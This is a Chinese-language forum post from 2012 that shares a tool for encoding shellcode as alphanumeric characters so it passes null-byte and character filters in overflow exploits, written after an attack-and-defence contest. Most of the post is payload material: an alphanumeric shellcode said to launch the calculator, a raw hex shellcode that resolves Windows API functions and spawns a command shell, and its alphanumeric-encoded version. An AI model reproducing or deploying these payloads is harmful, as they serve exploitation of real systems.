好友
阅读权限40
听众
最后登录1970-1-1
|
半斤八兩
发表于 2012-10-7 16:04
/*
最近在玩西安电子大学的网络攻防比赛,里面的溢出赛题蛮有意思的,之前没有接触过.
其中最后一题的FTP溢出题,我写的EXP在我电脑上运行是正常的.可是在朋友的电脑上却失败.
最终原因,就是因为ShellCode的部分数据的影响.
最后看到别人有全字符的ShellCode,看起来很酷.(在网上搜了一下,看来源好像是Zwell写的ShellCode.)
后来拿来研究了一下.
其代码是分两段解释器.
都是将字母ShellCode转换成真正的ShellCode.
以此来绕过截0和其它等限制.
此代码的解释器用的是老外的.我只是改成MFC了.方便大家 :)
ShellCode From:
EAX
ECX
EDX
EBX
ESP
EBP
ESI
EDI
NOP
[ESP-0x10]
[ESP-0xC]
[ESP-0x8]
[ESP-0x4]
[ESP]
[ESP+0X4]
[ESP+0X8]
[ESP+0XC]
[ESP+0X10]
[ESP+0X14]
[ESP+0X18]
[ESP+0X1C]
[SEH]
Zwell's ShellCode:
char szShellCode[]=
"PZhSSUSX5SSUSH4C0B6RYkA7XA3A7A2B70B7BhTWUQX5TWUQ4c8A7ubi3PI7kQ1W"
"6W1EV9A84xdeLg3kIUKl3J6DuWNA8wk0kstyzbDKryeyza82vAMdMgMFjKVyBlEC"
"6aLM1PkaQxMXmC72VL4Oei1YUf1xmfqhh8d2V6ibZ7yCnxTUyelUTCeJ7YOM5HTu"
"ECIwjOLAkppdMagoJMl5ur69UdyEUysaAR9tG4ksEgaGEIy95zlsrRt2rt6twkhg"
"JNNBViHbsVE76oDEuUmwBpkanAQU30kavJmiUiqpMQMANIxonAMi5XHibCBnGNFJ"
"VJ3gGZhZ545BmdPGFoCuFb2mMiegVwvPLaCSyKWtAInpGu4jUxUwNa8c";
// 这个shellcode好像是打开计算器
本程序转换前的CmdShell:
"FC33D2B23064FF325A8B520C8B52148B722833C9B11833FF33C0AC3C617C022C20C1CF0D03F8E2F081FF5BBC4A6A8B5A108B1275DA8B533C03D3FF72348B527803D38B722003F333C941AD03C381384765745075F4817804726F634175EB8178086464726575E2498B722403F3668B0C4E8B721C03F38B148E03D3526878656301FE4C24036857696E455453FFD268636D6401FE4C24036A0533C98D4C240451FFD068657373018BDFFE4C24036850726F63684578697454FF742420FF54242057FFD0";
// 本程序这个打开的是控制台
本程序转换后的CmdShell:
"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylTsxROBP0Pdyo6RqJLKV2dLLKsbDTLKCBThDsHIMaTXTskOgCKpLlulu1sLs2FLepiQJoTMVcjXM2L0OqKOCkMlQZqznkBzDPLKDRD5yJLK0SGLuSZsKOqbvTlK3bPxdCxSNkT210uSZSP3O971nM5So3MQTxBgSUptPPRUL4oqqhuTRRPoqsw145JKmQD8c8u4pd420eBU9rSynkT2et7szSQvNkvlPNnkbRWl4CKCNkb4lNESkcRru8QhquSSEQ9nRlEtgsrHpWsYrNpECdpSyoZrU8e3pmE4UQKNRlutfcQz5UVSO9LMpLtdGtSayoJpRHu5Ps2SuQLKyOKNRlwTC3U82prRpo53bHSuPxbIBTV4KOptetWPkOsdQ4GPaGkOWp"
*/
简单程序,大牛路过~
ShellCodeToAscii.rar
(22.02 KB, 下载次数: 104)
|
免费评分
-
查看全部评分
|
发帖前要善用【论坛搜索】功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。 |
|
|
|
|